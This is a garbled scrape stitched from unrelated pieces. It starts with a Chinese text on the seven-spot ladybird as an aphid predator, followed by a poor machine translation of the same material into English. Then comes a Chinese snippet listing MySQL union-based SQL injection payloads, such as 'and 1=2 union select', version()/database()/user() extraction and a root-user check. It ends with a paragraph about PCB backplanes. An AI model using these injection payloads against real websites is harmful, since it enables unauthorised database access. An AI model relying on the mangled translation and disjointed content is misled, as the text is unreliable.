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Soccinella septempunctata Linnaeus (瓢虫科)






七星瓢虫是鞘翅目瓢虫科的捕食性天敌昆虫,在我国各地广泛分布。20世纪70年代在黄河下游已开始用助迁法防治棉花和小麦蚜虫,90年代开始人工繁殖,并用于生产。 七星瓢虫以鞘翅上有7个黑色斑点而得名。每年发生世代数因地区不同而异。例如,在河南安阳地区每年发生6-8代。北方寒冷地区,每年发生世代数则较少。七星瓢虫成虫寿命长,平均77天,以成虫和幼虫捕食蚜虫、叶螨、白粉虱、玉米螟、棉铃虫等幼虫和卵。七星瓢虫1头雌虫可产卵567-4475粒,平均每天产卵78.4粒,最多可达197粒。 七星瓢虫取食量大小与气温和猎物密度有关。以捕食蚜虫为例,在猎物密度较低时,捕食量随密度上升而呈指数增长;在密度较高时,捕食量则接近极限水平。气温高的条件下,影响七星瓢虫和猎物的活动能力,捕食率提高。据统计,七星瓢虫对烟蚜的平均日取食量为:1龄10.7头,2龄33.7头,3龄60.5头,4龄124.5头,成虫130.8头。七星瓢虫近80天的生命期可取食上万头蚜虫。 毒性 七星瓢虫对人、畜和天敌动物无毒无害,无残留,不污染环境。



七星瓢虫有较强的自卫能力,虽然身体只有黄豆那么大,但许多强敌都对它无可奈何。它3对细脚的关节上有一种“化学武器”,当遇到敌害侵袭时,它的脚关节能分泌出一种极难闻的黄色液体,使敌人因受不了 而仓皇退却、逃走。它还有一套装死的本领,当遇到强敌和危险时,它就立即从树上落到地下,把3对细脚收缩在肚子底下,装死躺下,瞒过敌人而求生。


Coccinella septempunctata (Coccinellidae)

Distribution in China's north-east, north, central, northwest, east and south-west provinces and autonomous regions such as; another documented in Mongolia, North Korea, Japan, the former Soviet Union, India and Europe.

Adult body length 5.2-6.5 mm, 4-5.6 mm wide. Body oval, arch his back, was like half a bailer. Head black, eyes black, the inside of each indentation Department 1 yellow spots. Brown tentacles. Mouthparts black. Additional yellow side. Pronotum black, the former have a larger corner of the light yellow to nearly square. Small black scutellum. Coleoptera red or orange, a total of seven spots on both sides; fin base in small scutellum on each side a white triangle. Abdomen and feet black body.

Multi-generation years. To adults over the winter, 4, born the following year hibernation. Aphid eggs in a host plant. Adults and larvae are a variety of aphids, such as food canarium. Department of beneficial insects, to be protected.

Coccinella septempunctata is a well-known natural enemies of pests, the adult may be preying on aphids, Aphis gossypii, Aphis Cassia, green peach aphid, scale insects, tick and other pests, can significantly reduce the trees, fruits and a variety of crop pests damage suffered by the people referred to as "living pesticide."

Coccinella septempunctata Coleoptera Coccinellidae are predators of insects, in the widely distributed all over the country. 70s in the 20th century the lower reaches of the Yellow River has started to move with helping to control the cotton and wheat aphid, 90 during the beginning of artificial propagation, and for the production. Coccinella septempunctata Coleoptera in the seven black spots are named after. Several generations each year vary from region to region. For example, in the Henan Anyang 6-8 each year on behalf of the region. Cold northern region, several generations occur each year are less. Coccinella septempunctata adult life span is longer, an average of 77 days, to adults and larvae prey aphids, spider mites, whitefly, corn borer, Helicoverpa armigera larvae and eggs and so on. Coccinella septempunctata a female can lay 567-4475 tablets, with an average 78.4 eggs per day up to 197. Coccinella septempunctata check food temperature and prey size and density. To aphid predation as an example, in the low prey density, prey density increased with an increase in an exponential growth; in the higher density, the predator is close to the limits of the level of volume. High temperature conditions, the impact of Coccinella septempunctata and the activity of prey, predation rates. According to statistics, Aphidius Coccinella septempunctata on the average daily food intake for admission: 1 age of 10.7, 2 age 33.7, 3 age 60.5, 4 age 124.5, adult 130.8. Coccinella septempunctata nearly 80 days of life may be feeding on aphids 10000. Coccinella septempunctata toxicity to human, animal and natural animal-friendly non-toxic, non-residual, non-pollution of the environment.

Coccinella septempunctata in China is fairly well distributed, the distribution of the region in Beijing, Liaoning, Jilin, Heilongjiang, Hebei, Shandong, Shanxi, Henan, Shaanxi, Jiangsu, Zhejiang, Shanghai, Hubei, Hunan, Jiangxi, Fujian, Guangdong, Sichuan, Yunnan , Xinjiang, Tibet, Inner Mongolia and other places, commonly found in farmland, forests, gardens, orchards, etc..

Coccinella septempunctata is a well-known natural enemies of pests, the adult may be preying on aphids, Aphis gossypii, Aphis Cassia, green peach aphid, scale insects, tick and other pests, can significantly reduce the trees, fruits and a variety of crop pests damage suffered by the people referred to as "living pesticide."

Coccinella septempunctata have a stronger self-defense capability, although the body is only so much soy, but many have a strong enemy can do nothing about it. Its three pairs of small joints of the feet, there is a "chemical weapons", when faced with invasion敌害, its feet joints can secrete a yellow liquid of very unpleasant, so that the enemy can not stand and panic due to retreat, to escape. It also has a ability to play dead, when faced with powerful enemies and danger, it immediately fell on the ground floor from a tree, and three pairs of small feet under contraction in the stomach, lie down and play dead, hidden from the enemy and survive.

There is also a wonderful between septempunctata habits: the boundaries between the beneficial insects and pests is clear, non-interfering, non-marriage, maintained their own traditions and customs, so regardless of how much mass the next generation will not have a "half-breed" and will not change their traditional habits.

union select 1,2,3,4,5,6,7,8,9,10,11 from 的意思?

通常from后面都会有一个表名,比如 admin id user之类的union select 1,2,3,4,5,6,7,8,9,10,11 from。


Order by num/*


and 1=1 union select 1,2,3,4,5…….n/*


and 1=2 union select 1,2,3,4,5…..n/*


version() database() user()


and 1=2 union all select version() /*

and 1=2 union all select database() /*

and 1=2 union all select user() /*


and 1=2 union all select @@global.version_compile_os from mysql.user /*


and ord(mid(user(),1,1))=114 /* 返回正常说明为root







单板是 单块PCB板构成的功能模块(并不一定需要背板连接,如电缆跨接或叠层连接)。 背板 是一种特殊的板,用于连接各个单板以构成一个完整的箱系统。 相比单板而言,背板的技术要求可能更高(涉及到功率和速率等)。背板的技术指标直接影响到整个系统的性能。电路板功能比较复杂,器件比较多,一块电路板放不下,而系统对电路板的大小又有很严格的要求,但对高度不限制,可以通过在电路板上放接插件,把几块电路板插在一起,可能一块板被别的电路板背着,同时自己又背着别的电路板。

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